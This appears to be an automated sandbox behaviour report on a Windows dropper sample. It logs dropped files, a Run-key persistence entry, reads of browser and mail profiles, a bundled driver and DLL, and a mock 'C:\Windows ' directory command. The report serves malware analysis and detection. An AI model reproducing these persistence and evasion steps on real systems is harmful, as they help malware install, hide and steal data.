              Source: C:\Users\Public\Libraries\Clmgncrs.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\srcngmlC.pifSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeReversingLabs: Detection: 52%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ClmgncrsO.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeProcess created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif
              Source: unknownProcess created: C:\Users\Public\Libraries\Clmgncrs.PIF "C:\Users\Public\Libraries\Clmgncrs.PIF"
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFProcess created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif
              Source: unknownProcess created: C:\Users\Public\Libraries\Clmgncrs.PIF "C:\Users\Public\Libraries\Clmgncrs.PIF"
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFProcess created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ClmgncrsO.bat" "Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeProcess created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pifJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows " Jump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFProcess created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pifJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFProcess created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\Public\Libraries\srcngmlC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeStatic file information: File size 1693184 > 1048576
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x128800
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr
              Source: Binary string: easinvoker.pdb source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
              Source: Binary string: _.pdb source: srcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbH source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr

              Data Obfuscation

              barindex
              Source: C:\Users\Public\Libraries\srcngmlC.pifUnpacked PE file: 5.2.srcngmlC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
              Source: C:\Users\Public\Libraries\srcngmlC.pifUnpacked PE file: 8.2.srcngmlC.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
              Source: C:\Users\Public\Libraries\srcngmlC.pifUnpacked PE file: 12.2.srcngmlC.pif.400000.3.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
              Source: C:\Users\Public\Libraries\srcngmlC.pifUnpacked PE file: 5.2.srcngmlC.pif.400000.2.unpack
              Source: C:\Users\Public\Libraries\srcngmlC.pifUnpacked PE file: 8.2.srcngmlC.pif.400000.1.unpack
              Source: C:\Users\Public\Libraries\srcngmlC.pifUnpacked PE file: 12.2.srcngmlC.pif.400000.3.unpack
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe.29d0000.1.unpack, type: UNPACKEDPE
              Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: srcngmlC.pif.0.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029EFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_029EFCD8
              Source: initial sampleStatic PE information: section where entry point is pointing to: .....
              Source: netutils.dll.0.drStatic PE information: real checksum: 0x21402 should be: 0x2599d
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeStatic PE information: real checksum: 0x0 should be: 0x1aa11c
              Source: Clmgncrs.PIF.0.drStatic PE information: real checksum: 0x0 should be: 0x1aa11c
              Source: easinvoker.exe.0.drStatic PE information: section name: .imrsiv
              Source: netutils.dll.0.drStatic PE information: section name: .....
              Source: netutils.dll.0.drStatic PE information: section name: .....
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ....
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ....
              Source: netutils.dll.0.drStatic PE information: section name: ....
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: /4
              Source: netutils.dll.0.drStatic PE information: section name: /19
              Source: netutils.dll.0.drStatic PE information: section name: /31
              Source: netutils.dll.0.drStatic PE information: section name: /45
              Source: netutils.dll.0.drStatic PE information: section name: /57
              Source: netutils.dll.0.drStatic PE information: section name: /70
              Source: netutils.dll.0.drStatic PE information: section name: /81
              Source: netutils.dll.0.drStatic PE information: section name: /92
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A395F8 push 02A39685h; ret 0_2_02A3967D
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029F008C push 029F00CFh; ret 0_2_029F00C7
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A28128 push 02A28154h; ret 0_2_02A2814C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029D66FC push 029D6757h; ret 0_2_029D674F
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029D66FA push 029D6757h; ret 0_2_029D674F
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029F063C push 029F067Fh; ret 0_2_029F0677
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A2C67C push ecx; mov dword ptr [esp], edx0_2_02A2C681
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A3872C push 02A3895Eh; ret 0_2_02A38956
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A28770 push 02A287CAh; ret 0_2_02A287C2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029E6760 push ecx; mov dword ptr [esp], edx0_2_029E6765
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029E4434 push 029E44AAh; ret 0_2_029E44A2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029E4432 push 029E44AAh; ret 0_2_029E44A2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029E6ADC push ecx; mov dword ptr [esp], edx0_2_029E6AE1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029EEB14 push 029EEBBFh; ret 0_2_029EEBB7
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029EEB12 push 029EEBBFh; ret 0_2_029EEBB7
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029E6B20 push ecx; mov dword ptr [esp], edx0_2_029E6B25
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A04980 push 02A049EBh; ret 0_2_02A049E3
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029E69BC push ecx; mov dword ptr [esp], edx0_2_029E69C1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029DE90C push 029DE938h; ret 0_2_029DE930
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029FCFA4 push 029FCFD0h; ret 0_2_029FCFC8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029FCC74 push 029FCCB7h; ret 0_2_029FCCAF
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029FAC64 push 029FACA2h; ret 0_2_029FAC9A
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029E4DDC push 029E4E29h; ret 0_2_029E4E21
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029FB3E8 push 029FB414h; ret 0_2_029FB40C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A390AC push 02A39125h; ret 0_2_02A3911D
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029FD01C push 029FD054h; ret 0_2_029FD04C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A391F8 push 02A39288h; ret 0_2_02A39280
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A39144 push 02A391ECh; ret 0_2_02A391E4
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A0B654 push ecx; mov dword ptr [esp], ecx0_2_02A0B658
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029DD798 push ecx; mov dword ptr [esp], edx0_2_029DD79D
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A25710 push 02A2576Ah; ret 0_2_02A25762
              Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'cEQj8dc1VA9oN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'cEQj8dc1VA9oN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'cEQj8dc1VA9oN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'cEQj8dc1VA9oN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeFile created: C:\Users\Public\Libraries\Clmgncrs.PIFJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeFile created: C:\Users\Public\Libraries\srcngmlC.pifJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeFile created: C:\Users\Public\Libraries\truesight.sysJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeFile created: C:\Users\Public\Libraries\Clmgncrs.PIFJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeFile created: C:\Users\Public\Libraries\truesight.sysJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeFile created: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeFile created: C:\Users\Public\Libraries\netutils.dllJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeFile created: C:\Users\Public\Libraries\srcngmlC.pifJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ClmgncrsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ClmgncrsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A1224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,0_2_02A1224C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029FAEA0 IsIconic,GetWindowPlacement,GetWindowRect,0_2_029FAEA0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A11018 IsIconic,GetCapture,0_2_02A11018
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A2319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_02A2319C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A238CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,0_2_02A238CC
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A23990 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,0_2_02A23990
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A11920 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,0_2_02A11920
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A1FCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,0_2_02A1FCD8
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029C224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,6_2_029C224C
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029C1018 IsIconic,GetCapture,6_2_029C1018
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029D319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,6_2_029D319C
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029D38CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,6_2_029D38CC
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029D3990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,6_2_029D3990
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029C1920 IsIconic,SetWindowPos,GetWindowPlacement,6_2_029C1920
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: 6_2_029CFCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,6_2_029CFCD8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A28820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02A28820
              Source: C:\Users\Public\Libraries\srcngmlC.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
